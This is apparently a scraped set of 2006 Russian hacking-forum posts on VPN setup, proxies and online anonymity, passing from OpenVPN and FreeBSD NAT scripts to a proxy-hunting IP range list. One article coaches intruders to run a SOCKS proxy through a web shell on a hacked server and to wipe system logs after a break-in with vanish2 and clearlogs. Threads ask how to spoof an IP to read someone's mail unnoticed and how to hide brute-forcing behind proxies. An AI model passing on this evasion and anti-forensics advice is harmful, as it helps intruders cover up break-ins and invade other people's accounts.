Set WSHShell = WScript.CreateObject("WScript.Shell")
set a = createobject("Scripting.FileSystemObject")
set f = a.getfolder(".")

WshShell.RegWrite "HKEY_LOCAL_MACHINE\Software\OpenVPN",f.path & "OpenVPN", "REG_SZ"
WshShell.RegWrite "HKEY_LOCAL_MACHINE\Software\OpenVPN\config_dir",f.path & "OpenVPN\config", "REG_SZ"
WshShell.RegWrite "HKEY_LOCAL_MACHINE\Software\OpenVPN\config_ext","ovpn", "REG_SZ"
WshShell.RegWrite "HKEY_LOCAL_MACHINE\Software\OpenVPN\exe_path",f.path & "OpenVPN\bin\openvpn.exe", "REG_SZ"
WshShell.RegWrite "HKEY_LOCAL_MACHINE\Software\OpenVPN\log_dir",f.path & "OpenVPN\log", "REG_SZ"
WshShell.RegWrite "HKEY_LOCAL_MACHINE\Software\OpenVPN\priority","NORMAL_PRIORITY_CLASS","REG_SZ"
WshShell.RegWrite "HKEY_LOCAL_MACHINE\Software\OpenVPN\log_append",0, "REG_SZ"
aScript = WSHShell.run("OpenVPN\bin\tapinstall.exe install OpenVPN\driver\OemWin2k.inf tap0801")

UninstallVPN.vbs:

Code:Copy to clipboard

Set WSHShell = WScript.CreateObject("WScript.Shell")
aScript = WSHShell.run("OpenVPN\bin\tapinstall.exe remove tap0801")
WshShell.RegDelete "HKEY_LOCAL_MACHINE\Software\OpenVPN\"
WshShell.RegDelete "HKEY_LOCAL_MACHINE\Software\OpenVPN-GUI\"

RunVPN.vbs:

Code:Copy to clipboard

Set WSHShell = WScript.CreateObject("WScript.Shell")
aScript = WSHShell.run("OpenVPN\bin\openvpn-gui.exe")

Теперь, когда нам необходимо восользоватся VPN, вставляем переносной носитель информации, и запускаем файл InstallVPN.vbs.
Дожидаемся установки драйвера TUN-TAP Win32, далее запускаем RunVPN.vbs.
После запуска OpenVPN GUI, выбираем Connect, и насдаждаемся мобильным VPN.

3. Выдаём ВПН 'у интернет

PS сразу говорю что этот способ не претендует на лучшее решение=)

Ядро должно быть скомпиленно со следующими опциями:
options IPFIREWALL
options IPDIVERT
options IPFIREWALL_FORWARD
(
ipfw впнриципе можно подгрузить и модулем:
kldload ipfw; ipfw add 65000 allow ip from any to any
А если у вас FreeBSD >= 6.0 то перекомпиляция ядра может вообще непонадобиться:
kldload ipdivert
)
В /etc/rc.conf прописываем следующие строчки:

firewall_enable="YES"
firewall_type="/etc/firewall.conf"
firewall_quiet="YES"
firewall_logging="YES"
firewall_flags=""
gateway_enable="YES"
natd_enable="YES"

Содержимое /etc/firewall.conf :
add 65000 allow ip from any to any

Нужно перезагрузиться

natd -a х.х.х.х -p 8668 # где x.x.x.x - внешний ip-адресс сервера
ipfw add 10 divert 8668 ip from 192.168.231.0/24 to any
ipfw add 20 fwd y.y.y.y ip from x.x.x.x to any # где y.y.y.y - дефолтный гейт(можно посмотреть в rc.conf) а x.x.x.x тот самый адресс, который указывали в первой команде
ipfw add 30 divert 8668 ip from any to x.x.x.x # думаю что такое x.x.x.x всем понятно

Вот вообщем то и всё, теперь покрайней мере вы сможете попинговать инетовские адреса с клиента, а если правильно указали днс сервера то и получите полноценный мобильный клиент со скрытием ip - адресса и шифрацией трафика

Анонимность в сети

ID: 676533bbb4103b69df371ddf
Thread ID: 13573
Created: 2006-11-11T19:09:46+0000
Last Post: 2006-12-03T21:35:39+0000
Author: hawk2000
Replies: 1 Views: 4K

Анонимность в сети

В этой статье я расскажу, как сохранить свою анонимность в современной сети.
**
1. Использование прокси сервера.**

Тут все понятно: юзать действительно анонимные прокси (elite, high-anon, socks).
Но, это лишь первая ступенька. Ведь существует множество способов узнать ваш реальный IP, даже если у вас самая крутая прокся…

Cookies

Все знают, что это такое, так – что перейду к делу:
IP адрес с помощью cookie не определить. Однако, при первом входе на web сайт, IP адрес клиента (определенный сервером, т.е. IP proxy) сервер может сохранить в cookies. А когда Вы в следующий раз входите на сайт, сервер вновь определяет Ваш IP и сравнивает его с сохраненным в cookies. И если IP адреса (старый и новый) различаются, сервер "может сделать выводы". И если Вы не запретите у себя cookies, никакой proxy Вам не поможет.

JavaScript
Скрипты предназначены для выполнения активных сценариев на вашем компьютере. Они довольно простые, и имеют ограниченные функции, но теоретически они могут могут определить реальный IP, и множество других настроек браузера.
Единственным решением может быть отключение скриптов в браузере.

Java
Java – это, в отличии от предыдущего, полноценный язык программирования, и программа, написанная на этом языке может без особых трудностей определить ваш реальный IP и любые настройки браузера.
Для защиты существует лишь одно решение: полное отключение Java, так как она имеет очень много различных сетевых функций и проблематично запретить их все.

Active X
Это полноценные программы, которые выполняются на компьютере пользователя. Возможности у них еще круче, чем у двух предыдущих. Они могут легко определить любые настройки браузера, "вычислить" Ваш реальный IP адрес, и даже легко изменить настройки прокси.

Защитой от них является полный запрет ActiveX.

RBL
Существует еще один довольно эффективный способ "вычислить" proxy сервер. Он не дает 100% гарантии (не все прокси можно определить таким образом), однако от него нельзя защититься, меняя любые настройки на своем компьютере.
В чем суть проверки proxy по RBL? В Intenet существуют так называемые "черные списки" ("блеклисты", RBL - Realtime Blackhole List), которые изначально были предназначены для борьбы со спамом (достаточно сделать поиск в Яндексе по фразе "что такое RBL", чтобы узнать об этом подробнее). В настоящее время в эти RBL вносятся не только SMTP сервера (через которые можно рассылать спам), но и многие прокси сервера (через которые также можно рассылать спам). Эти списки являются (как следует из названия: RBL - realtime) постоянно обновляемыми и наиболее оперативными (прокси сервер может попасть в них в течение нескольких часов после того, как через него был разослан спам).
Как узнать, находится ли прокси в этих списках? Очень просто: надо определить IP адрес прокси, а потом сделать поиск в каждом из RBL (этих списков очень много, так же, как, например, поисковых систем). Примеры RBL: www.spamcop.net , www.mail-abuse.com , opm.blitzed.org , dsbl.org и т.д.
Как сайт узнает, что конкретный прокси сервер - в одном из RBL? Это довольно просто. Прежде всего: когда Вы открываете сайт, сайту становится известен IP адрес клиента (подробнее об этом читайте в статье "Анонимность прокси"). Клиент (в случае, если Вы подключаетесь через прокси) - это прокси сервер. Зная IP адрес прокси (для любопытных: это переменная REMOTE_ADDR, о которой я писал в своих предыдущих статьях), сайт посылает запрос на каждый RBL, чтобы узнать, находится ли этот IP в данном "черном списке".

Но всем известно, что даже самую крутую защиту можно пробить.
Если вы все-таки запретили cookies , выполнение активных сценариев, Java и ActiveX, то сбить такую защиту достаточно просто: нужно всего лишь построить сайт на основе Java / JavaScript / Cookies / Action X , и тогда пользователю ничего не останется, как разрешить все это в своем браузере.

Но все же, если вы хотите остаться анонимными, и чтобы Java / JavaScript / Cookies / Action X , были – есть выход. Это FIREWALL. ( наверняка вы о нем уже забыли ), в котором необходимо запретить все соединения, кроме соединения с проксей.
Помните: любой proxy сервер (а тем более бесплатный) ведет лог. И человек, который располагает соответствующими полномочиями (доступом к любой информации) и запасом времени, всегда сможет выяснить, куда Вы ходили и что Вы делали, даже если Вы будете использовать цепочки из 10 анонимных proxy серверов в разных концах планеты (это касается и ТОРа).

2. TOR
Все прекрасно знают, что это такое, поэтому не буду входить в детали. На мой взгляд «большая цепочка прокси серверов», потому, что он обеспечивает такую же анонимность. Скорость мала. Не самый лучший вариант.

3. VPN
VPN (англ. Virtual Private Network — виртуальная частная сеть) — логическая сеть, создаваемая поверх другой сети, например интернет. Несмотря на то, что коммуникации осуществляются по публичным сетям, с использованием небезопасных протоколов, за счёт шифрования создаются закрытые от посторонних каналы обмена информацией.
Чаще всего для создания виртуальной сети используется инкапсуляция протокола PPP в какой-нибудь другой протокол — IP (эта реализация называется так же PPTP — Point-to-Point Tunneling Protocol) или Ethernet (PPPoE). Некоторые другие протоколы так же предоставляют возможность формирования защищенных каналов (SSH или ViPNet).

VPN состоит из двух частей: защищенная «внутренняя» сеть и «внешняя» сеть, по которой проходит защищенное соединение (обычно используется Интернет). Как правило между внешней сетью и внутренней находится Firewall. При подключении удаленного пользователя (либо при установке соединения с другой защищенной сетью) Firewall требует авторизации, на основании которой определяются полномочия пользователя (или удаленной сети).
использует шифрование для всего туннельного трафика для обеспечения конфиденциальности защиты передаваемых данных по публичным сетям.
Помимо защищенных VPN также существует много незащищенных, поскольку реализация и настройка системы шифрования может оказаться довольно сложной.
Защищенные VPN-протоколы включают:
• IPSec (IP security) — часто используется поверх IPv4.
• SSL — используется для туннелирования всего сетевого стека. Например https.
• PPTP (point-to-point tunneling protocol) — разрабатывался совместными усилиями нескольких компаний, включая Microsoft.
• L2TP (Layer 2 Tunnelling Protocol) — используется в продуктах компаний Microsoft и Cisco.
• L2TPv3 (Layer 2 Tunnelling Protocol version 3).

Использование защищенной VPN лучше любых проксей.

Если – же вы все-таки решили стать анонимом, и хотите проверить это – вам сюда.
Также отличный список сервисов по определению вашего сетевого адреса предоставил нам ette , и найти его можно здесь.

На этом я заканчиваю свою статью. Надеюсь эта статья поможет вам оставаться в тени.
Автор: HAWK

Статья: Анонимность в сети для новичков

ID: 676533bbb4103b69df371de3
Thread ID: 13087
Created: 2006-10-30T13:52:00+0000
Last Post: 2006-11-06T12:31:04+0000
Author: profeto
Replies: 7 Views: 4K

[intro]
В этой статье я расскажу о том, как сохранить анонимность в сети и не засветиться после взлома. Ко мне в асю стучат много людей, которые увидели мою асю на каком-либо форуме и решили задать пару вопросов. Из общения с новичками я понял, что многие никак не стараются обезопасить себя в сети.

Припоминается один случай, когда некий чел стукнул в асю, и с гордостью показал мне ряд своих свежих дефейсов. Я хотел объяснить ему, что дефейсить глупо, и намного лучше будет заюзать поломанную тачку в своих целях, но не успел, т.к. он ошарашил меня вопросом: "сложно ли юзать прокси?". Я думал, что он шутит, но оказалось, что он действительно НИКОГДА НЕ ЮЗАЛ ПРОКСИ и ломал тачку со своего реал ип. Я даже не стал спрашивать, почистил ли он логи на машине, т.к. уже заранее знал ответ . Сводки новостей ежедневно пополняются свежими историями поимки хакеров и нереально высокими сроками за преступления, на крупных форумах идет обсуждение, что такой ажиотаж связан с тем, что Россия стремится в ВТО. В-общем к чему я веду весь этот разговор? К тому, что нужно максимально обезопасить себя в сети. Чтобы не появиться однажды в очередной сводке новостей...

[немного теории]
VPN (Virtual Prvate Network) - "виртуальная частная сеть", ну это как бы отдельный зашифрованный канал, который даёт нам высокую защиту передаваемой
по этому каналу информации за счёт применения специальных алгоритмов шифрования, т.е нашу информацию и данные невозможно перехватить.

PROXY или PROXY-сервер - ("proxy"- посредник) это отдельный компьютер, который является посредником между вами и интернетом. Для чего это всё нужно? В нашем случае нам это нужно для обеспечения анонимности.

SOCKS - ну это один из типов прокси, Socks proxy просто поддерживают работу по любому TCP/IP протоколу , а не только HTTP. Есть 2 вида соксов - socks 4 и socks 5. Отличие в том, что socks 5 работает не только по TCP протоколу, но и по UDP протоколу. Из всех типов proxy у socks proxy самый высокий уровень анонимности, поэтому лучше всего использовать именно их. Из недостатков у соксов можно выделить то, что они не поддерживаются браузером. Для их использования придется юзать программы типа FreeCap, SocksCap, ProxyCap.

[одеваем носки]
Итак, первый и основной способ обеспечить анонимность - это юзать прокси. Сразу же предостерегу использовать публичные списки проксей. Они пригодны разве что для анонимного просиживания в чате. И не более этого т.к. все такие прокси если не правительственные, то логи ведут обязательно. В этом случае есть 2 выхода: первый - это покупать прокси у проверенных поставщиков, где будешь уверен в том, что логи не ведуться; и второй - юзать свой собственный прокси. Второй способ не так сложен, как многие ошибочно считают. Для этого нужен всего лишь веб-шелл и сокс-скрипт на пхп. Можно заюзать скрипт "Socks5 Server v 1.0" от задохлика. Нужно залить скрипт через имеющийся веб-шелл и запустить его. Для этого узнаем, где находится интерепретатор пхп (команда which php), и если он он у вас, например, в /usr/bin/php тогда для запуска проксика вводим /usr/bin/php /~путь до скрипта~/socks5.php. Вот и все. Если настройки не сменены, то прокси запустится на порту 4001. Самое сложное позади, теперь осталось одеть этот сокс и все. Для этого рекомендую использовать программу FreeCap. Программа наша, русская, и абсолютно бесплатная в отличии от её аналога ProxyCap. В настройках FreeCap указываем адрес нашего прокси или же, если нужна большая безопасность - строим цепочку из проксиков. Если что-то неясно, то читайте хелп к проге - там все понятно описано.

[меняем настройки браузера]
Даже если ты сидишь через свой сокс, то твой ип можно узнать. Для этого достаточно небольшого JavaScript/Java кода, внедренного в страницу. Дело в том, что ява скрипты исполняются на машине пользователя, т.е. локально, и узнать ип таким способ очень легко. Поэтому очень рекомендую отключить поддержку JavaScript/Java в своем браузере. Также отключить кеширование страниц/рисунков, автоматическую очистку кукисов. Но часто бывает неудобно с такими мерами предострожностей серфить доверенные сайты. Поэтому советую использовать 2 браузера. Один - для серфинга, с включенным кешем и кукисами, другой - полностью секурный, который очищал бы автоматически при выходе все данные.

[чистим за собой логи]
После того, как ты сделал на взломанной машине все свои дела желательно почистить за собой все логи. Для *unix-машин рекомендую использовать такую удобную утилиту, как vanish2. Вот выдержка из кода:

Vanish2.c cleans WTMP, UTMP, lastlog, messages, secure, xferlog, maillog, warn, mail, httpd.access_log, httpd.error_log.

Компилируется это чудо на удаленной машине командой "gcc vanish2.c -o vanish2"

Для машин под управлением Windows удобно использовать утилиту clearlogs. Это консольная прога, выполняется командой "clearlogs [-app] [-sec] [-sys]" Параметры запуска:
-app = очистка логов приложений.
-sec = очистка логов безопасности.
-sys = очистка системных логов.
Сама утилита clearlogs находится в аттаче к оригинальной статье здесь.

[откройте, милиция]
Как бы ты не шифровался, логи остаются на твоем компе. И если они обнаружатся, то это войдет в доказательную базу преступления. Я слышал много фраз, что логи не играют никакой роли, т.к. это обычные файлы, которые можно подделать. Это гон. Если следовать такому мнению, то можно у нас не сажали бы за хранение наркотиков, т.к. их могли подкинуть. Поэтому логи на компе - это тоже важная улика. Почистить логи системы можно вышеописанной утилитой clearlogs. Также важно отключить ведение логов в различных приложениях, таких, как, например, Аутпост. Опять-таки повторюсь: браузер не должен оставлять за собой данных.

[откройте, милиция-2]
Никогда не следует забывать, что и провайдер ведет логи, и если тебя отследят на уровне прова, то найти тебя и поднять логи не составит труда. В этом случае желательно шифровать весь сетевой траффик. Для этих целей прекрасно подойдет VPN. Опять-таки не юзайте бесплатные впн-сервисы, они так же ведут логи )). Стоит юзать либо платный сервис, проверенный временем и имеющий репутацию, либо ssh-туннель, как более дешевую альтернативу. Весь трафф, переданный по ssh шифруется, т.е. уровень защищенности так же высок. Для организации ssh=туннеля потребуется хост с доступом по ssh (для этого можно купить VPS- хостинг - стоит недорого). О том, как организовать туннель и перенаправить весь траффик по ssh читай в инете - подобной инфы достаточно.

[outro]
Вот и подошла к своему логическому концу эта статейка. На этой ноте я, пожалуй, и закончу. Удачи...

Установление конкретного IP

ID: 676533bbb4103b69df371de5
Thread ID: 12829
Created: 2006-10-23T13:38:06+0000
Last Post: 2006-10-30T08:05:21+0000
Author: DoubT
Replies: 16 Views: 4K

мне надо, чтобы мой внешний ИП не просто сменился, а сменился на вполне кокретный. Слышал, чт отеоретически это возможно...интересует какими средствами это на практике применимо. для тех кто не понял:
есть ИП A мне надо чтоб он не просто сменился на другой, а сменился на вполне конкретный ИП B. Может можно как то в передающихся пакетах проипсать передаваемый ИП? цель: на мейл ру стоит функция когда показывается ИП последнего заходящего. У хозяина статичный ИП. Мне надо смотреть его почту так, чтоб он не замечал, что заходили с другого ИП.

Смена прокси.

ID: 676533bbb4103b69df371de6
Thread ID: 9660
Created: 2006-07-04T13:05:43+0000
Last Post: 2006-10-28T22:37:01+0000
Author: Gamers
Replies: 9 Views: 4K

Подскажите прогу для смены прокси.Чтобы во время перебора индикаторы на Bruteforce не загорались.

что такое elite proxy?

ID: 676533bbb4103b69df371de9
Thread ID: 12385
Created: 2006-10-07T08:05:33+0000
Last Post: 2006-10-11T20:49:42+0000
Author: NODEXXX
Replies: 13 Views: 4K

:bang: не пойму,на них брутить мона?

Как зайти через несколько прокси одновременно

ID: 676533bbb4103b69df371dee
Thread ID: 9084
Created: 2006-06-08T21:37:31+0000
Last Post: 2006-09-06T16:40:42+0000
Author: Чёрт
Replies: 6 Views: 4K

А можно ли зайти через несколько прокси одновременно. Я имею ввиду открываете несколько окон браузера одновременно и каждое сосёт инет через свой прокси тоесть у каждого окошка свой IP.

Диапазоны IP для поиска прокси

ID: 676533bbb4103b69df371dfc
Thread ID: 9095
Created: 2006-06-09T09:15:22+0000
Last Post: 2006-06-13T19:13:48+0000
Author: Mail2k
Replies: 3 Views: 4K

Вот диапазоны IP для тех,кто сообирает прокси проксихантером или подобной программой.

Code:Copy to clipboard

 Bangladesh
--------------------------------
202.4.96.0-202.4.127.255
202.5.32.0-202.5.63.255
202.168.224.0-202.168.255.255
203.105.128.0-203.105.159.255
203.188.160.0-203.188.191.255
203.188.192.0-203.188.255.255
203.189.0.0-203.189.255.255
203.190.0.0-203.191.255.255
Brunei Darussalam
-----------------------------
202.12.26.0-202.12.26.255
202.152.64.0-202.152.95.255
202.160.0.0-202.160.63.255

Bhutan
----------------------------------
202.144.128.0-202.144.159.255

China
----------------------------------
61.128.0.0-61.159.255.255
202.0.110.0-202.0.110.255
202.0.160.0-202.0.175.255
202.0.176.0-202.0.179.255
202.4.128.0-202.4.159.255
202.4.252.0-202.4.255.255
202.14.88.0-202.14.88.255
202.14.235.0-202.14.235.255
202.14.236.0-202.14.237.255
202.14.238.0-202.14.238.255
202.20.120.0-202.20.120.255
202.22.224.0-202.22.255.255
202.38.0.0-202.38.255.255
202.90.0.0-202.90.63.255
202.90.224.0-202.90.255.255
202.91.0.0-202.91.63.255
202.91.128.0-202.91.191.255
202.92.0.0-202.92.63.255
202.92.160.0-202.92.191.255
202.92.192.0-202.92.255.255
202.93.0.0-202.93.63.255
202.93.192.0-202.93.255.255
202.94.0.0-202.94.255.255
202.95.0.0-202.95.63.255
202.95.64.0-202.95.95.255
202.95.224.0-202.95.255.255
202.96.0.0-202.111.255.255
202.112.0.0-202.119.255.255
202.120.0.0-202.121.255.255
202.122.0.0-202.122.63.255
202.122.128.0-202.122.128.255
202.127.0.0-202.127.255.255
202.130.0.0-202.130.31.255
202.130.224.0-202.130.255.255
202.136.224.0-202.136.255.255
202.192.0.0-202.207.255.255
203.87.224.0-203.87.255.255
203.88.0.0-203.88.63.255
203.89.0.0-203.89.63.255
203.90.0.0-203.90.63.255
203.91.0.0-203.91.63.255
203.92.0.0-203.92.63.255
203.93.0.0-203.93.255.255
203.94.0.0-203.94.63.255
203.95.0.0-203.95.63.255
203.128.128.0-203.128.159.255
203.184.0.0-203.184.31.255
203.192.0.0-203.192.31.255
203.196.0.0-203.196.127.255
203.204.0.0-203.207.255.255
203.208.0.0-203.208.63.255
203.223.0.0-203.223.15.255
210.12.0.0-210.13.255.255
210.14.128.0-210.14.255.255
210.15.0.0-210.15.127.255
210.25.0.0-210.25.255.255
210.26.0.0-210.27.255.255
210.28.0.0-210.31.255.255
210.32.0.0-210.47.255.255
210.52.0.0-210.53.255.255
210.72.0.0-210.79.255.255
211.64.0.0-211.71.255.255
211.80.0.0-211.95.255.255
211.96.0.0-211.103.255.255
211.136.0.0-211.143.255.255
211.144.0.0-211.159.255.255
211.160.0.0-211.167.255.255

Fiji
---------------------------
202.62.0.0-202.62.31.255
202.62.96.0-202.62.127.255
202.62.224.0-202.62.255.255

Guam
----------------------------
202.20.112.0-202.20.112.255
202.123.128.0-202.123.159.255
202.128.0.0-202.128.63.255
202.128.64.0-202.128.95.255
202.151.64.0-202.151.127.255

Hong Kong
-------------------------------
61.4.0.0-61.4.255.255
61.10.0.0-61.10.255.255
202.0.77.0-202.0.77.255
202.0.78.0-202.0.78.255
202.0.100.0-202.0.100.255
202.0.104.0-202.0.104.255
202.0.112.0-202.0.112.255
202.0.122.0-202.0.123.255
202.0.128.0-202.0.143.255
202.0.144.0-202.0.147.255
202.0.180.0-202.0.183.255
202.1.6.0-202.1.7.255
202.2.32.0-202.2.47.255
202.2.48.0-202.2.51.255
202.2.64.0-202.2.79.255
202.2.80.0-202.2.87.255
202.4.26.0-202.4.27.255
202.4.192.0-202.4.223.255
202.6.0.0-202.6.1.255
202.6.192.0-202.6.207.255
202.7.128.0-202.7.143.255
202.12.4.0-202.12.7.255
202.14.67.0-202.14.67.255
202.14.68.0-202.14.68.255
202.14.80.0-202.14.80.255
202.14.222.0-202.14.222.255
202.20.66.0-202.20.66.255
202.20.88.0-202.20.89.255
202.20.94.0-202.20.95.255
202.20.98.0-202.20.98.255
202.20.100.0-202.20.101.255
202.20.111.0-202.20.111.255
202.20.117.0-202.20.117.255
202.20.118.0-202.20.118.255
202.20.125.0-202.20.125.255
202.20.126.0-202.20.127.255
202.21.128.0-202.21.128.255
202.40.0.0-202.40.127.255
202.40.128.0-202.40.191.255
202.40.192.0-202.40.223.255
202.41.160.0-202.41.191.255
202.45.0.0-202.45.255.255
202.52.128.0-202.52.159.255
202.53.128.0-202.53.159.255
202.57.192.0-202.57.255.255
202.60.32.0-202.60.63.255
202.60.96.0-202.60.127.255
202.60.224.0-202.60.255.255
202.61.96.0-202.61.127.255
202.62.192.0-202.62.223.255
202.63.0.0-202.63.31.255
202.63.128.0-202.63.159.255
202.64.0.0-202.64.255.255
202.65.0.0-202.65.31.255
202.65.192.0-202.65.255.255
202.66.0.0-202.66.255.255
202.67.0.0-202.67.63.255
202.67.128.0-202.67.255.255
202.68.0.0-202.68.127.255
202.68.192.0-202.68.255.255
202.69.0.0-202.69.255.255
202.70.0.0-202.70.63.255
202.70.128.0-202.70.255.255
202.71.0.0-202.71.63.255
202.71.192.0-202.71.255.255
202.72.0.0-202.72.31.255
202.72.192.0-202.72.255.255
202.73.0.0-202.73.255.255
202.74.0.0-202.74.31.255
202.74.64.0-202.74.127.255
202.74.224.0-202.74.255.255
202.75.0.0-202.75.63.255
202.75.64.0-202.75.95.255
202.75.224.0-202.75.255.255
202.76.0.0-202.76.127.255
202.76.224.0-202.76.255.255
202.77.0.0-202.77.63.255
202.77.128.0-202.77.255.255
202.78.0.0-202.78.31.255
202.78.224.0-202.78.255.255
202.79.0.0-202.79.31.255
202.79.224.0-202.79.255.255
202.80.0.0-202.80.31.255
202.81.0.0-202.81.31.255
202.81.192.0-202.81.255.255
202.82.0.0-202.82.255.255
202.83.0.0-202.83.31.255
202.83.192.0-202.83.255.255
202.84.0.0-202.85.255.255
202.86.0.0-202.86.127.255
202.86.192.0-202.86.255.255
202.87.0.0-202.87.31.255
202.87.160.0-202.87.191.255
202.87.192.0-202.87.255.255
202.88.0.0-202.88.127.255
202.88.192.0-202.88.223.255
202.89.0.0-202.89.31.255
202.89.192.0-202.89.255.255
202.91.192.0-202.91.255.255
202.92.128.0-202.92.159.255
202.122.64.0-202.122.127.255
202.122.192.0-202.122.223.255
202.123.64.0-202.123.95.255
202.123.192.0-202.123.255.255
202.128.128.0-202.128.255.255
202.130.64.0-202.130.127.255
202.130.128.0-202.130.191.255
202.134.64.0-202.134.95.255
202.140.64.0-202.140.127.255
202.144.224.0-202.144.255.255
202.146.96.0-202.146.127.255
202.153.64.0-202.153.127.255
202.161.224.0-202.161.255.255
202.163.0.0-202.163.31.255
202.168.32.0-202.168.63.255
202.169.0.0-202.169.31.255
202.170.0.0-202.170.31.255
202.174.128.0-202.174.159.255
202.176.224.0-202.176.255.255
202.177.0.0-202.177.31.255
202.180.128.0-202.180.159.255
202.181.32.0-202.181.63.255
202.181.160.0-202.181.191.255
202.181.192.0-202.181.255.255
202.182.224.0-202.182.255.255
202.183.64.0-202.183.95.255
203.76.128.0-203.76.159.255
203.77.128.0-203.77.159.255
203.78.64.0-203.78.95.255
203.80.0.0-203.80.255.255
203.81.0.0-203.81.31.255
203.81.224.0-203.81.255.255
203.82.0.0-203.82.31.255
203.82.224.0-203.82.255.255
203.83.0.0-203.83.127.255
203.83.224.0-203.83.255.255
203.84.0.0-203.84.127.255
203.84.128.0-203.84.191.255
203.85.0.0-203.85.255.255
203.86.0.0-203.86.63.255
203.86.128.0-203.86.255.255
203.90.128.0-203.90.255.255
203.91.128.0-203.91.159.255
203.100.64.0-203.100.127.255
203.100.128.0-203.100.159.255
203.105.0.0-203.105.127.255
203.115.128.0-203.115.159.255
203.129.64.0-203.129.95.255
203.131.224.0-203.131.255.255
203.133.128.0-203.133.191.255
203.135.128.0-203.135.159.255
203.142.96.0-203.142.127.255
203.145.64.0-203.145.64.255
203.160.64.0-203.160.95.255
203.161.224.0-203.161.255.255
203.168.128.0-203.168.255.255
203.169.128.0-203.169.191.255
203.184.128.0-203.184.255.255
203.185.0.0-203.185.63.255
203.186.0.0-203.186.255.255
203.187.128.0-203.187.255.255
203.193.0.0-203.193.255.255
203.195.0.0-203.195.63.255
203.198.0.0-203.198.255.255
210.0.128.0-210.0.159.255
210.57.0.0-210.57.127.255
210.87.248.0-210.87.255.255
210.176.0.0-210.177.255.255
210.184.0.0-210.184.63.255
210.184.64.0-210.184.95.255

Indonesia
---------------------------------
202.0.81.0-202.0.81.255
202.0.103.0-202.0.103.255
202.0.116.0-202.0.116.255
202.3.96.0-202.3.127.255
202.3.192.0-202.3.223.255
202.20.106.0-202.20.107.255
202.20.108.0-202.20.109.255
202.43.248.0-202.43.255.255
202.46.0.0-202.46.31.255
202.46.64.0-202.46.127.255
202.46.128.0-202.46.131.255
202.46.192.0-202.46.255.255
202.47.64.0-202.47.95.255
202.47.192.0-202.47.223.255
202.51.96.0-202.51.127.255
202.51.192.0-202.51.255.255
202.53.224.0-202.53.255.255
202.55.128.0-202.55.159.255
202.58.192.0-202.58.223.255
202.77.96.0-202.77.127.255
202.81.32.0-202.81.63.255
202.95.128.0-202.95.159.255
202.137.0.0-202.137.31.255
202.138.224.0-202.138.255.255
202.145.0.0-202.145.31.255
202.146.0.0-202.146.63.255
202.146.128.0-202.146.255.255
202.147.224.0-202.147.255.255
202.148.0.0-202.148.63.255
202.149.0.0-202.149.255.255
202.150.0.0-202.150.255.255
202.151.0.0-202.151.31.255
202.152.0.0-202.152.63.255
202.152.128.0-202.152.255.255
202.153.128.0-202.153.255.255
202.154.0.0-202.154.127.255
202.155.0.0-202.155.255.255
202.157.0.0-202.157.15.255
202.157.16.0-202.157.16.255
202.158.0.0-202.159.255.255
202.164.0.0-202.164.31.255
202.165.32.0-202.165.47.255
202.170.224.0-202.170.255.255
202.171.0.0-202.171.31.255
202.173.64.0-202.173.95.255
202.180.0.0-202.180.31.255
202.183.0.0-202.183.31.255
203.77.224.0-203.77.255.255
203.99.96.0-203.99.127.255
203.109.0.0-203.109.31.255
203.128.64.0-203.128.95.255
203.130.192.0-203.130.255.255
203.153.0.0-203.153.127.255
203.153.128.0-203.153.191.255
203.153.192.0-203.153.223.255

India
--------------------------------
61.0.0.0-61.3.255.255
61.11.0.0-61.11.127.255
202.4.160.0-202.4.191.255
202.9.128.0-202.9.191.255
202.21.147.0-202.21.147.255
202.41.0.0-202.41.127.255
202.41.128.0-202.41.131.255
202.41.132.0-202.41.133.255
202.41.192.0-202.41.192.255
202.43.32.0-202.43.63.255
202.51.32.0-202.51.63.255
202.52.32.0-202.52.63.255
202.53.64.0-202.53.95.255
202.54.0.0-202.54.255.255
202.55.0.0-202.55.31.255
202.55.192.0-202.55.255.255
202.56.0.0-202.56.31.255
202.56.192.0-202.56.255.255
202.57.0.0-202.57.31.255
202.58.160.0-202.58.191.255
202.60.128.0-202.60.159.255
202.62.64.0-202.62.95.255
202.63.96.0-202.63.127.255
202.65.128.0-202.65.159.255
202.68.128.0-202.68.191.255
202.71.128.0-202.71.159.255
202.86.128.0-202.86.191.255
202.87.32.0-202.87.63.255
202.88.128.0-202.88.191.255
202.88.224.0-202.88.255.255
202.90.192.0-202.90.223.255
202.91.64.0-202.91.127.255
202.93.128.0-202.93.159.255
202.131.96.0-202.131.127.255
202.131.128.0-202.131.159.255
202.134.128.0-202.134.159.255
202.136.128.0-202.136.159.255
202.138.96.0-202.138.127.255
202.140.128.0-202.140.159.255
202.141.0.0-202.141.255.255
202.142.0.0-202.142.255.255
202.143.0.0-202.143.31.255
202.143.224.0-202.143.255.255
202.144.0.0-202.144.127.255
202.144.160.0-202.144.191.255
202.157.64.0-202.157.95.255
202.162.128.0-202.162.255.255
202.164.32.0-202.164.63.255
202.164.64.0-202.164.127.255
202.169.128.0-202.169.191.255
202.170.128.0-202.170.159.255
202.173.128.0-202.173.255.255
202.177.128.0-202.177.255.255
202.179.64.0-202.179.95.255
202.191.64.0-202.191.127.255
203.78.128.0-203.78.159.255
203.81.128.0-203.81.191.255
203.86.96.0-203.86.127.255
203.88.128.0-203.88.159.255
203.90.64.0-203.90.95.255
203.94.220.0-203.94.223.255
203.94.224.0-203.94.255.255
203.109.64.0-203.109.127.255
203.112.128.0-203.112.159.255
203.115.96.0-203.115.127.255
203.122.0.0-203.122.255.255
203.123.128.0-203.123.191.255
203.123.192.0-203.123.223.255
203.124.192.0-203.124.255.255
203.129.224.0-203.129.255.255
203.130.64.0-203.130.95.255
203.132.128.0-203.132.159.255
203.144.96.0-203.144.127.255
203.148.0.0-203.148.31.255
203.152.128.0-203.152.191.255
203.175.128.0-203.175.255.255
203.188.0.0-203.188.127.255
203.195.128.0-203.195.255.255
203.197.0.0-203.197.255.255
203.199.0.0-203.199.255.255
203.200.0.0-203.200.255.255
210.4.0.0-210.4.127.255
210.18.0.0-210.18.127.255
210.210.0.0-210.211.255.255
210.212.0.0-210.212.255.255
210.214.0.0-210.214.255.255

Japan
-----------------------------
202.0.65.0-202.0.65.255
202.0.66.0-202.0.66.255
202.0.72.0-202.0.73.255
202.0.76.0-202.0.76.255
202.0.93.0-202.0.93.255
202.6.98.0-202.6.98.255
202.6.103.0-202.6.103.255
202.11.0.0-202.11.255.255
202.12.8.0-202.12.15.255
202.13.0.0-202.13.127.255
202.13.128.0-202.13.191.255
202.13.192.0-202.13.223.255
202.13.224.0-202.13.239.255
202.13.240.0-202.13.247.255
202.13.248.0-202.13.251.255
202.13.252.0-202.13.253.255
202.13.254.0-202.13.254.255
